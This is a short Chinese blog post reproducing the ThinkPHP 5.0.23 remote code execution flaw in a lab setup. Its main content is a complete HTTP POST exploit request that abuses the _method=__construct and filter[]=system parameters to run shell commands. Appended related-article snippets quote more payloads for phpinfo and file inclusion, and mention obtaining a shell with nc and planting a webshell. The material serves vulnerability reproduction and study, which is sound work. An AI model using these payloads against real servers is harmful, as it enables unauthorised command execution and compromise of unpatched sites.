ThinkPHP 5.0.* 远程代码执行漏洞

最新推荐文章于 2025-07-17 10:24:13 发布
原创 最新推荐文章于 2025-07-17 10:24:13 发布 · 7.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了使用ThinkPHP版本5.0.23进行环境搭建的过程,并分享了一段用于测试的payload示例。该payload通过POST请求发送到特定的URL,展示了如何利用系统命令在目标环境中执行操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以5.0.23搭建环境。
payload如下:

POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1
Host: 192.168.170.186
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=date;ls -al

在这里插入图片描述

Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*5.1*5.2*
墨痕诉清风的博客
11-07 4680
官方公告:1、2、POC:批量检测单个检测。
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 1217
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
ThinkPHP 5.x远程命令执行漏洞复现
WY92139010的博客
09-23 790
ThinkPHP 5.x远程命令执行漏洞复现 一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.05.1...
Thinkphp5-0-X远程代码执行漏洞
qq_40624810的博客
11-09 1186
参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276 其实后面的&test=-1参数没有意义,只要有captcha就行 在post里加上我们要提交的参数 _method=__construct&filter[]=phpinfo&method=GET 提交...
ThinkPHP8 Windows开发全流程:从搭建到上线
最新发布
邓邓子的博客
07-17 1030
本文详细介绍了 Windows 系统下 ThinkPHP8 开发全流程。前期需准备 PHP 8.0 + 环境、Composer、Web 服务器、数据库及开发工具。安装环节涵盖 Composer 与 ThinkPHP8 的具体步骤,以及 Web 服务器配置和常见问题解决。还讲解了内置开发服务器的启动、调试技巧,前后端分离项目中前端搭建、后端 API 配置及联调方法,最后阐述部署环境准备与项目部署步骤。ThinkPHP8 依托 PHP8 新特性提升效率,为开发者提供强大工具,助力构建高性能 Web 应用。
thinkphp5漏洞
https://www.cnblogs.com/zpchcbd/
04-10 1418
文件包含: http://ip/index.php?s=captcha&m=1 post提交: _method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]= 代码执行漏洞: http://bugbank.51vi...
攻防世界 ThinkPHP V5漏洞解析及利用)
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5漏洞,接下来我详细介绍一下thinkphp V5这个漏洞ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 1万+
ThinkPHP5系列远程代码执行漏洞复现(详细)
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 2727
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 ...通过对ThinkPHP 5.0远程代码执行漏洞的深入分析,我们不仅了解了该漏洞的工作原理,同时也学到了如何避免类似的漏洞出现,这对于提高软件的安全性至关重要。
解决 captchas 验证码Python例子
09-02
如何机器学习验证码,然后通过机器学习,得到验证码的
ThinkPHP5.0.* Request类远程代码执行漏洞分析
"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞,具体是关于request函数的远程代码执行问题,涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1337
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2253
thinkPHP5漏洞复现
ThinkPHP 5.0 * 远程代码执行漏洞分析
热门推荐
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
thinkphp 源码分析系列(二)—— 路由
qq_41891666的博客
11-05 606
0x00 前言 这篇文章主要是结合 thinkphp 5.0.x 两个rce : (1)变量覆盖filter (2)没有开启强制路由导致rce 来分析thinkphp 的路由 0x01 路由检测 首先要说的是$dispatch 调度信息, 类似于: 调度信息最后会传入App::exec() 中: 而exec 会根据调度信息的type ,去调用相应的函数去映射到具体的函数上去执行。 App.php 中run() 函数中,$dispatch 是通过 App.php 中的routeCheck() 函数返回
ThinkPHP5 5.0.23远程代码执行漏洞复现
weixin_52685785的博客
03-15 272
s=captcha会出现如下报错。对其进行挂马操作(讲一句话木马进行base64加密)用HackBar 插件向其发送POST 请求。进入vulhub中漏洞环境的目录,启动环境。出现报错,进入需要修改的文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值